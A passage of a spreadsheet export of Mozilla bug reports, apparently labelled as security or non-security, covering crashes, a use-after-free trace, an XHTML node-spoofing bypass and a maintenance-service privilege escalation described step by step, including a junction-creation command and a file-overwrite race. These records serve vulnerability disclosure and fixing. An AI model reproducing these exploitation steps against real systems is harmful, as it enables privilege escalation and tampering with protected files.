In recent Win32 Mozilla builds the default action when cliking a file link is
not saving it to the disk but something called in the dialog "Default action"
(no explanation). Actually for most file types that means opening them with an
application (a mime controlled action, I presume). In today's build there is no
such  dialog but the "default action" is taken with no warning.  Luckily, for 
the *.exe files now the default is a save. However there are some file types
which are opened with no warnong or dialog. They include the inherently unsafe
*.doc files.  
Reproducible: Always
Steps to Reproduce:
0. Install Microsoft Word
1. Click on a link to any *.doc file
2. See the file open in Word with no warning
3. Use an anti-virus utility to check the damage :-(
Actual Results:  File is opened by the default mime indicated application with
no warning
Expected Results:  A dialog to choose save or opening should open. Preferably
with save as the default (bug 79631)
Additional remarks: The same problem may happen wth some other file types</t>
        </is>
      </c>
      <c r="X9" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="n">
        <v>737129</v>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>2012-03-19 12:27:29 -0700</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>Possible Exploitable Crashes with Low Memory [@ nsiNodeInfo::NodeInfoManager ] with js::mjit::EnterMethodJIT on the stack</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>2015-10-16 11:40:02 -0700</t>
        </is>
      </c>
      <c r="E10" t="n">
        <v>1</v>
      </c>
      <c r="F10" t="n">
        <v>1</v>
      </c>
      <c r="G10" t="n">
        <v>3</v>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L10" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M10" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N10" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O10" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P10" t="inlineStr">
        <is>
          <t>[sg:critical][fixed by bug 737875][qa-]</t>
        </is>
      </c>
      <c r="Q10" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R10" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S10" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T10" t="n">
        <v>1</v>
      </c>
      <c r="U10" t="n">
        <v>0</v>
      </c>
      <c r="V10" t="n">
        <v>19</v>
      </c>
      <c r="W10" t="inlineStr">
        <is>
          <t>Created attachment 607258
sample crash report
1. http://members.home.nl/bdr/files/fusker.html?http://members.home.nl/bdr/files/fusker.html%3Fhttp://i.crackedcdn.com/phpimages/photoshop/%5B1-9%5D/%5B1-9%5D/%5B1-9%5D/%5B1-9%5D%5B00-99%5D_slide.jpg
2. Consume CPU and RAM until you crash
###!!! ASSERTION: Inserting node that already has parent: '!aKid-&gt;GetNodeParent()', file c:/work/mozilla/builds/nightly/mozilla/cont
ent/base/src/nsGenericElement.cpp, line 3757
Crashes Nightly/14, Aurora/13, Beta/12, Firefox/11 on Windows XP and Windows 7.
Firefox/11
bp-9c5f6e84-81d0-49ff-83f4-385fd2120319
[@ EMPTY: no crashing thread identified; corrupt dump ] 
Nightly/14
bp-6d234ff4-7365-4282-8f8b-db3ca2120319
[@ EMPTY: no crashing thread identified; corrupt dump ] 
Operating system: Windows NT
                  6.1.7601 Service Pack 1
CPU: x86
     GenuineIntel family 6 model 37 stepping 1
     2 CPUs
Crash reason:  EXCEPTION_ACCESS_VIOLATION_EXEC
Crash address: 0xffffffffb0fdfdfd
Thread 0 (crashed)
 0  0xb0fdfdfd
    eip = 0xb0fdfdfd   esp = 0x0052aba8   ebp = 0x0052abc4   ebx = 0x1f4bb790
    esi = 0x063479b0   edi = 0x04e605c0   eax = 0xff00a5f0   ecx = 0xdddddddd
    edx = 0xb0fdfdfd   efl = 0x00010286
    Found by: given as instruction pointer in context
Note the heap fenceposts 0xfd and the deleted memory. Other reports show 0xfeeefeee which is freed Heap memory from HeapFree. Common pattern in all reports so far is ecx = 0xdddddddd
Running under windbg I crash at [@ nsiNodeInfo::NodeInfoManager ]
More reports are available in Bughunter.</t>
        </is>
      </c>
      <c r="X10" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="n">
        <v>778151</v>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>2012-07-27 08:17:18 -0700</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>[ia] Product landing page</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>2012-08-14 12:37:05 -0700</t>
        </is>
      </c>
      <c r="E11" t="n">
        <v>1</v>
      </c>
      <c r="F11" t="n">
        <v>1</v>
      </c>
      <c r="G11" t="n">
        <v>5</v>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L11" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M11" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N11" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O11" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P11" t="inlineStr">
        <is>
          <t>u=user c=wiki p=1</t>
        </is>
      </c>
      <c r="Q11" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R11" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S11" t="inlineStr">
        <is>
          <t>2012.15</t>
        </is>
      </c>
      <c r="T11" t="n">
        <v>1</v>
      </c>
      <c r="U11" t="n">
        <v>0</v>
      </c>
      <c r="V11" t="n">
        <v>10</v>
      </c>
      <c r="W11" t="inlineStr">
        <is>
          <t>The new IA has a product landing page for each of our products (defined in products table).
This bug covers:
* Create a new view and template for the page
* The page should live at /&lt;locale&gt;/products/&lt;product slug&gt;
* The page shows list of topics (with images) that apply to this product (uses facets)
This bug doesn't cover:
* Styling the page
* Linking to the topic+product article listing.
* Hot topics section
* Sidebar
* Download button
* Version and OS picker
See bug 762255 for the latest design</t>
        </is>
      </c>
      <c r="X11" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="n">
        <v>298892</v>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>2005-06-27 05:12:08 -0700</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>Node spoofing (using e.g. XHTML) to bypass security checks</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>2007-04-01 15:11:25 -0700</t>
        </is>
      </c>
      <c r="E12" t="n">
        <v>1</v>
      </c>
      <c r="F12" t="n">
        <v>1</v>
      </c>
      <c r="G12" t="n">
        <v>3</v>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I12" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L12" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M12" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N12" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O12" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P12" t="inlineStr">
        <is>
          <t>[sg:fix] ready for landing</t>
        </is>
      </c>
      <c r="Q12" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R12" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S12" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T12" t="n">
        <v>1</v>
      </c>
      <c r="U12" t="n">
        <v>0</v>
      </c>
      <c r="V12" t="n">
        <v>41</v>
      </c>
      <c r="W12" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.9) Gecko/20050626 Firefox/1.0.5
According to Bonsai, some url-checks of image.src have been added for bug 292774
and bug 292737 (I cannot see bug 292774 and bug 292737).  But, those can be
bypassed.
The following url-check has been added for bug 292774.
    viewImage : function (e) {
        urlSecurityCheck( this.imageURL, document )
        openUILink( this.imageURL, e );
    },
The following url-checks have been added for bug 292737.
 browser.js:
    else if (makeURL(this.target.src).scheme == "javascript")
        disableSetWallpaper = true;
 setWallpaper.xul:
    if (makeURL(window.arguments[0].src).scheme == "javascript")
      return false;
Vulnerable code from nsContextMenu.prototype.setTarget:
        if ( this.target.nodeType == Node.ELEMENT_NODE ) {
             if ( this.target.localName.toUpperCase() == "IMG" ) {
                this.onImage = true;
                this.imageURL = this.target.src;
Exploit:
1) In an XHTML document, since tags are case-sensitive, &lt;IMG&gt; element is not a
HTMLImageElement, it is a HTMLUnknownElement that does not have |src| property.
thus, content can make chrome access content-defined getter function of |src|
property of &lt;IMG&gt; element.
2) The approach for bypassing url-check is the same as Bug 249332 (Bypassing
CheckLoadURI using custom getters and changing toString returns).
Note: The trunk is not affected thanks to the fix for Bug 281988.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X12" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="n">
        <v>990868</v>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>2014-04-01 20:33:56 -0700</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>limit ChannelMergerNode output channel count</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>2014-07-30 02:00:28 -0700</t>
        </is>
      </c>
      <c r="E13" t="n">
        <v>1</v>
      </c>
      <c r="F13" t="n">
        <v>1</v>
      </c>
      <c r="G13" t="n">
        <v>3</v>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I13" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L13" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M13" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N13" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O13" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P13" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q13" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R13" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S13" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T13" t="n">
        <v>1</v>
      </c>
      <c r="U13" t="n">
        <v>0</v>
      </c>
      <c r="V13" t="n">
        <v>21</v>
      </c>
      <c r="W13" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #990794 +++
If we land a fix for the size calculation in bug 990794, then that leave a DOS bug, which can be fixed by limiting the channel count.
Fixing the DOS gives away more information about how to induce the integer and heap overflow, so we have the option of landing this fix separately.
See also bug 987679 which can be induced through large channel counts.</t>
        </is>
      </c>
      <c r="X13" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="n">
        <v>1237219</v>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>2016-01-06 02:52:23 -0800</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>Mozilla maintenance service arbitrary file overwrite allowing privilege escalation</t>
        </is>
      </c>
      <c r="D14" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:14 -0700</t>
        </is>
      </c>
      <c r="E14" t="n">
        <v>1</v>
      </c>
      <c r="F14" t="n">
        <v>1</v>
      </c>
      <c r="G14" t="n">
        <v>3</v>
      </c>
      <c r="H14" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I14" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L14" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M14" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N14" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O14" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P14" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q14" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R14" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S14" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T14" t="n">
        <v>0</v>
      </c>
      <c r="U14" t="n">
        <v>0</v>
      </c>
      <c r="V14" t="n">
        <v>44</v>
      </c>
      <c r="W14" t="inlineStr">
        <is>
          <t>Created attachment 8704556
Exploit source code
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20151223140742
Steps to reproduce:
A combination of vulnerabilities in updater.cpp allows to overwrite arbitrary files, including protected files in protected folders (such as c:\windows), allowing privilege escalation (for example, by overwriting one of the many executables that are scheduled to run periodically with SYSTEM privileges).
The main vulnerability is that files extracted by ArchiveReader are not locked for writing and can be overwritten while the update is running.
Since a software-update command can be run in any location by unprivileged users, an attacker can choose to run it from a controlled location and overwrite files extracted by updater.exe. By overwriting files as they are being extracted, the attacker can force updater.exe to overwrite any file. I explain the procedure below (after "Steps to reproduce").
The updater will only accept to overwrite files that are in the update location and its subfolders (the updater rejects any path that is not relative, or that contains ".."). But it doesn't check if the path contains junctions, allowing to circumvent this protection. Unlike symlinks, junctions can be created by unprivileged users.
Using a combination of both these vulnerabilities allow to overwrite any file in any protected location.
This is all theoretical, so I wrote an exploit in order to prove the seriousness of this vulnerability. This has been tested successfully on Windows 7 and Windows 10 (both 64 bits) with Firefox 43.0.2 and 43.0.3 (32 bits).
Steps to reproduce:
* Download the FirefoxExploit.zip project and unzip it.
* If necessary, modify any of the configuration parameters in main.cpp (junctionName, fileToOverwrite, and defaultMarPatchFileToOverwrite). In the next steps I'll assume you're using the default values.
* Compile the project (I used VS2013, any recent version should be alright). You get FirefoxExploit.exe.
* From a privileged account, create a file in c:\windows named exploitpoc.txt and put some text in it (e.g. "Original content"). This is the file that will be overwritten as a proof of concept.
* Download the latest mar file (firefox-43.0.2-43.0.3.partial.mar: http://releases.mozilla.org/pub/firefox/releases/43.0.3/update/win32/en-US/firefox-43.0.2-43.0.3.partial.mar , replace en-US by the correct language).
* Optionally, create a limited user account on the computer you are going to run the exploit on (this is to prove the privilege escalation) and log in with it.
* Place FirefoxExploit.exe and the mar file in a directory. I'll assume it's c:\firefox_pe in the next steps.
* Create a file named exploitpocnew.txt in c:\firefox_pe. Put any content in it (e.g. "Exploit successful"); it will replace c:\windows\exploitpoc.txt after the exploit is successful.
* Open a cmd shell. Go to c:\firefox_pe.
* Create a junction named "exploit" which points to c:\windows : mklink /J exploit c:\windows
* Execute the exploit: FirefoxExploit.exe exploitpocnew.txt
* Open c:\windows\exploitpoc.txt . It now contains "Exploit successful".
Below is an explanation of how the exploit works. For complete details, refer to the source code (mainly main.cpp).
The exploit will first prepare some things:
* Detect the Firefox installation directory, copy updater.exe from it into c:\firefox_pe (so that the maintenance service accepts to run the update from this location).
* Open the mar file, make sure the version is correct (downgrade is refused), make sure it contains the files needed.
* Read the updatev3.manifest and the original patch from the mar file, so that it can detect later when updater.exe has decompressed enough data from them.
* Generate (using bsdiff) the rogue patch file that will overwrite the legitimate patch.
Then, it will start the update by launching the maintenance service with the appropriate parameters. As soon as it is launched, it will continually monitor the c:\firefox_pe\updating directory, where updater.exe puts files extracted from the mar archive.
The first step of the exploit is to continually check for the presence of update.manifest (extracted by updater.exe). As soon as it is here, it is continually read until enough data is written to it. It is then overwritten with our rogue manifest, which contains a single PatchFile action with the file we want to overwrite as a destination.
The second step is to continually check for the presence of 0.patch (this is updater.exe extracting the legitimate patch file from the mar). Again, as soon as enough data is written to it, it is overwritten with our rogue patch. At this point, it is still being written to by updater.exe, so it is repeatedly truncated to the size of our rogue patch.
Then, updater.exe will apply our rogue patch to the file we want to overwrite. The exploit is successful; you can check that c:\windows\exploitpoc.txt contains the content of exploitpocnew.txt ("Exploit successful").
I'll be happy to provide any help needed to run the exploit successfully. I strongly advise to run the exploit on a multi-core machine; the race condition is much more likely to succeed if it can run concurrently to updater.exe since it has busy loops.</t>
        </is>
      </c>
      <c r="X14" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="n">
        <v>938626</v>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>2013-11-14 08:24:55 -0800</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>Make pref changes a bit safer in PresContext</t>
        </is>
      </c>
      <c r="D15" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:02 -0800</t>
        </is>
      </c>
      <c r="E15" t="n">
        <v>1</v>
      </c>
      <c r="F15" t="n">
        <v>1</v>
      </c>
      <c r="G15" t="n">
        <v>3</v>
      </c>
      <c r="H15" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I15" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J15" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K15" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L15" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M15" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N15" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O15" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P15" t="inlineStr">
        <is>
          <t>[qa-][adv-main28+]</t>
        </is>
      </c>
      <c r="Q15" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R15" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S15" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T15" t="n">
        <v>1</v>
      </c>
      <c r="U15" t="n">
        <v>0</v>
      </c>
      <c r="V15" t="n">
        <v>4</v>
      </c>
      <c r="W15" t="inlineStr">
        <is>
          <t>Created attachment 832278
prescontext_pref.diff
PreferenceChanged may end up causing reflows and what not, yet we have only
raw refs to objects.
It also calls AppUnitsPerDevPixelChanged after possible reflow, so mDeviceContext
can be null.
This may fix Bug 891840.</t>
        </is>
      </c>
      <c r="X15" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" t="n">
        <v>795804</v>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>2012-09-30 22:22:11 -0700</t>
        </is>
      </c>
      <c r="C16" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsTextEditorState::PrepareEditor</t>
        </is>
      </c>
      <c r="D16" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:35 -0700</t>
        </is>
      </c>
      <c r="E16" t="n">
        <v>1</v>
      </c>
      <c r="F16" t="n">
        <v>1</v>
      </c>
      <c r="G16" t="n">
        <v>3</v>
      </c>
      <c r="H16" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I16" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J16" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K16" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L16" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M16" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N16" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O16" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P16" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+][asan]</t>
        </is>
      </c>
      <c r="Q16" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R16" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S16" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T16" t="n">
        <v>1</v>
      </c>
      <c r="U16" t="n">
        <v>0</v>
      </c>
      <c r="V16" t="n">
        <v>29</v>
      </c>
      <c r="W16" t="inlineStr">
        <is>
          <t>Created attachment 666435
Testcase
Reproduces on trunk. Run a few firefox instances simultaneously for reproducing reliabily.
=================================================================
==19969== ERROR: AddressSanitizer heap-use-after-free on address 0x7f310f2083b0 at pc 0x7f313ddafc7c bp 0x7fffb5d04130 sp 0x7fffb5d04128
READ of size 8 at 0x7f310f2083b0 thread T0
    #0 0x7f313ddafc7b in nsTextEditorState::PrepareEditor(nsAString_internal const*) src/content/html/content/src/nsTextEditorState.cpp:1125
    #1 0x7f313ddcd603 in PrepareEditorEvent::Run() src/content/html/content/src/nsTextEditorState.cpp:1026
    #2 0x7f313cad7c4c in nsContentUtils::RemoveScriptBlocker() src/content/base/src/nsContentUtils.cpp:5021
    #3 0x7f313b04835e in ~nsAutoScriptBlocker src/../../../../dist/include/nsContentUtils.h:2275
    #4 0x7f313b0320a6 in ~nsAutoScriptBlocker src/../../../../dist/include/nsContentUtils.h:2274
    #5 0x7f313b43fc91 in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3834
    #6 0x7f313bb77232 in nsHideViewer::Run() src/layout/generic/nsSubDocumentFrame.cpp:782
    #7 0x7f313cad7c4c in nsContentUtils::RemoveScriptBlocker() src/content/base/src/nsContentUtils.cpp:5021
    #8 0x7f313b04835e in ~nsAutoScriptBlocker src/../../../../dist/include/nsContentUtils.h:2275
    #9 0x7f313b0320a6 in ~nsAutoScriptBlocker src/../../../../dist/include/nsContentUtils.h:2274
    #10 0x7f313ccf2af5 in nsDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) src/content/base/src/nsDocument.cpp:6371
    #11 0x7f313e668b5c in nsHTMLDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) src/content/html/document/src/nsHTMLDocument.h:87
    #12 0x7f3141f73cd6 in nsIDOMDocument_AdoptNode(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:3452
    #13 0x7f314d3dcd9f in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:370
    #14 0x7f314d37eb79 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2460
    #15 0x7f314d2caaee in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:324
    #16 0x7f314d3ea566 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:509
    #17 0x7f314d3ec2fb in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:546
    #18 0x7f314caff289 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5679
    #19 0x7f313ee16dee in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1506
    #20 0x7f313efcfb76 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9621
    #21 0x7f313ef876c4 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9880
    #22 0x7f313efcda28 in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10147
    #23 0x7f3146b44972 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #24 0x7f3146b45e7a in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #25 0x7f3146b09580 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:612
    #26 0x7f314679becb in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #27 0x7f31451e53b6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #28 0x7f3146dc1e11 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #29 0x7f3146dc1c46 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #30 0x7f3146dc1b2b in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #31 0x7f314468cdda in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #32 0x7f31432bf9b4 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:290
    #33 0x7f3139932a4d in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3782
    #34 0x7f31399388c5 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3848
    #35 0x7f313993b774 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3923
    #36 0x40d013 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #37 0x40a755 in main src/browser/app/nsBrowserApp.cpp:279
    #38 0x7f3157830c4c in ?? ??:0
0x7f310f2083b0 is located 48 bytes inside of 120-byte region [0x7f310f208380,0x7f310f2083f8)
freed by thread T0 here:
    #0 0x4c4af0 in free ??:0
    #1 0x7f31546bc586 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7f313e05e4a6 in operator delete(void*) src/../../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7f313e06b9b9 in nsHTMLInputElement::HandleTypeChange(unsigned char) src/content/html/content/src/nsHTMLInputElement.cpp:2621
    #4 0x7f313e09a2f4 in nsHTMLInputElement::ParseAttribute(int, nsIAtom*, nsAString_internal const&amp;, nsAttrValue&amp;) src/content/html/content/src/nsHTMLInputElement.cpp:2751
    #5 0x7f313cece403 in nsGenericElement::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) src/content/base/src/nsGenericElement.cpp:1952
    #6 0x7f313dd28b8d in nsGenericHTMLElement::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) src/content/html/content/src/nsGenericHTMLElement.cpp:1994
    #7 0x7f313dd0c5a3 in nsGenericHTMLElement::SetAttr(int, nsIAtom*, nsAString_internal const&amp;, bool) src/content/html/document/src/../../content/src/nsGenericHTMLElement.h:175
    #8 0x7f313dd0e4b7 in nsGenericHTMLElement::SetAttrHelper(nsIAtom*, nsAString_internal const&amp;) src/content/html/content/src/nsGenericHTMLElement.cpp:2863
    #9 0x7f313e0772d0 in nsHTMLInputElement::SetType(nsAString_internal const&amp;) src/content/html/content/src/nsHTMLInputElement.cpp:906
    #10 0x7f313e07733e in non-virtual thunk to nsHTMLInputElement::SetType(nsAString_internal const&amp;) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #11 0x7f3142620241 in nsIDOMHTMLInputElement_SetType(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:15518
    #12 0x7f314d6bf785 in js::CallJSPropertyOpSetter(JSContext*, int (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;), JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jscntxtinlines.h:456
    #13 0x7f314d6f6056 in js::baseops::SetPropertyHelper(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, unsigned int, JS::MutableHandle&lt;JS::Value&gt;, int) src/js/src/jsobj.cpp:4592
